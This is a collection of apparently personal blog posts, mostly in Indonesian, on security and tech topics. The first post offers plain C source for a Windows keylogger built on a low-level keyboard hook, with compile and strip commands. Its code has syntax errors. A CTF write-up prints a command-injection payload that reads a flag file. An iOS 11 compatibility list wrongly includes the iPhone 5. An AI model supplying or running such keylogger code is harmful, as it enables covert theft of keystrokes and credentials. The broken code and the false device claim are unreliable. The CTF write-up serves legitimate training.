[CODE] Writing a simple keylogger for Windows

The basic idea is;

#include <windows.h>
#include <stdio.h>

HHOOK hook;

LRESULT __stdcall
LLKBCallback(int nCode, WPARAM wParam lParam) {
    KBDLLHOOKSTRUCT kbdStruct;

    if (nCode == HC_ACTION && wParam == WM_KEYDOWN) {
        kbdStruct = *((KBDLLHOOKSTRUCT*)lParam);
        printf("keycode: 0x%x\n", kbdStruct.vkCode);
    }
   
    return CallNextHookEx(hook, nCode, wParam, lParam);
}

int main(argc, char **argv) {
    MSG msg;
    ShowWindow(FindWindowA("ConsoleWindowClass", NULL), 1);
    hook = SetWindowsHookEx(WH_KEYBOARD_LL, LLKBCallback, NULL, 0);
   
    if (!hook)
        MessageBox(NULL, "failed to install hook", "error", MB_ICONERROR);

    while (GetMessage(&msg, NULL, 0, 0));
}

Then cross-compile for windows

x86_64-w64-mingw32-gcc  -o keylog.exe keylog.c -static
x86_64-w64-mingw32-strip keylog.exe

That's it.

[HOWTO] Menghapus Kernel Lama Pada Ubuntu

Mengapa kita harus menghapus kernel lama pada server kita? Yang utama adalah untuk memberikan lebih banyak space pada hardisk server. Kali ini, saya akan share bagaimana saya menghapus kernel lama pada server ubuntu dengan menggunakan satu perintah saja dan tentunya cara ini sangat aman. Pertama-tama, mari kita cek ada berapa kernel lama yang terinstall pada server kita dengan menggunakan perintah

dpkg --get-selections | grep linux-image

Nanti akan muncul list kernel yang terinstall seperti gambar dibawah ini

Lalu bagaimana caranya menghapus semua kernel di atas dengan menggunakan 1 perintah saja? Sebenarnya bukan satu perintah, melainkan beberapa perintah yang saya kombinasikan menjadi satu kali eksekusi. Caranya, dengan menggunakan perintah dibawah ini

dpkg --list | grep linux-image | awk '{ print $2 }' | sort -V | sed -n '/'`uname -r`'/q;p' | xargs sudo apt-get -y purge

Mari saya jelaskan maksud dari perintah diatas secara satu-persatu

1. dpkg --list untuk mencari paket yang terinstall
2. grep linux-image untuk mencari nama paket linux-image
3. awk '{print $2}' untuk menampilkan kolom ke dua dari nama paket yang di cari
4. sort -V untuk mengurutkan berdasarkan nomor versi
5. sed -n '/'`uname -r`'/q;p' untuk menampilkan versi kernel sebelum kernel saat ini
6. xargs sudpo apt-get -y purge untuk menghapus paket yang di temukan

Jika di eksekusi, maka akan seperti ini

Dan mari kita cek posisi hardisk saat ini

Begitu proses penghapusan kernel lama selesai, maka akan muncul peringatan seperti ini

Cara mengatasinya cukup dengan mengupdate Grub pada Ubuntu kalian

sudo update-grub

Berikut adalah hasilnya

Sekarang mari kita bandingkan space hardisk setelah kita melakukan penghapusan pada kernel lama

Jika ada yang kurang di mengerti, silahkan komen dibawah 😀

Semoga bermanfaat 😀

[WRITEUP] ShellterLabs: Ping Test

Diberikan soal sebagai berikut

Lalu saya mendapatkan sebuah file url http://lab.shellterlabs.com:33792/ 

Saya mendapat sebuah page dimana saya harus memasukan sebuah ip untuk melakukan request ping, saya coba input dengan ip dns google, berikut adalah hasilnya

Kemudian saya coba mensisipi sebuah command line "ls", dan berikut adalah hasilnya

Terdapat sebuah file index.php dan flag.txt, lalu saya mencoba untuk merubah payload nya seperti ini

http://lab.shellterlabs.com:33792/index.php?host=8.8.8.8%3B+cat+flag.txt&submit=Ping%21

Berikut adalah hasil dari request dengan payload diatas

Di dapatkan flagnya, yaitu

shellter{B3_C4r3ful_W1TH_Us3R5_1NpUT}

[JOURNEY] Seminar di STTI I-Tech

Tadi siang, saya mengisi sebuah sebuah acara rutin yang di selenggarakan oleh SSTI I-tech dimana pada event tersebut kebetulan saya memberikan materi Defense yang berjudul "Defend Your Territory" pada materi yang saya bawakan lebih cenderung bagaimana cara kita untuk meresponse serangan dari internal to internal , atau external to internal dengan menggunakan bantuan IDS (Intrusion Detection System) yang saya buat dengan Snort lalu saya integrasikan dengan OSSIM (Open Source Security Information and Event Management). Bagi kalian yang ingin mendapatkan materinya, kalian bisa unduh disini (coming soon)

[WRITEUP] Backdoor CTF: 2013-BIN-50

Diberikan soal sebagai berikut:

Lalu saya mendapatkan sebuah file binary, lalu saya coba menjalankan file tersebut

Setelah saya coba menjalankan file binary tersebut, saya di minta untuk memasukan password yang mana jika saya memasukan password nya dengan benar maka flag akan terlampir. Hal yang saya lakukan adalah, saya mencoba untuk melihat printable text pada file binary tersebut dengan menggunakan perintah strings

Terdapat beberapa informasi yang menampilkan "password" di antaranya adalah

• Advicemallard
• Butter
• Hoobastank
• Darth
• Jedimaster
• Masternamer
• Morpheus
• Neutron
• Coyote
• Tweety

Saya mencoba satu persatu, dan password yang benar adalah Masternamer

Di dapatkan flag nya yaitu,

3cd50c6be9bbede06e51741928d88b7e

[INFO] Daftar Perangkat Yang Compatible Dengan IOS 11

Apple baru saja merilis IOS 11, berikut adalah perangkat Apple yang compatible dengan IOS 11

Iphone

• Iphone 7
• Iphone 7 Plus
• Iphone 6s
• Iphone 6s Plus
• Iphone 6
• Iphone 6 Plus
• Iphone SE
• Iphone 5

Ipad

• Ipad Pro 12.9 inci Generasi Kedua
• Ipad Pro 12.9 inci Generasi Pertama
• Ipad Pro 10.5 inci
• Ipad Pro 9.7 inci
• Ipad Air 2
• Ipad Air
• Ipad 9.7 Geneasi Kelima (2017)
• Ipad Mini 4
• Ipad Mini 3
• Ipad Mini 2

Ipod Touch

• Ipod Touch Generasi Keenam

[HOWTO] Mencari Model iPhone Dengan Mudah

Beberapa hari yang lalu, saya kesulitan untuk mencari model iPhone yang saya miliki, kemudian saya mendapatkan sebuah website yang sangat membantu saya dalam mengatasi masalah tersebut.

Silahkan kunjungi https://ipsw.me/device-finder lalu masukan nomor model pada iPhone anda

Settings -> General -> About -> Model

Lalu masukan nomor model iPhone kalian kesini

Secara otomatis, website tersebut akan mengidentifikasi model iPhone yang kalian miliki

Semoga membantu :)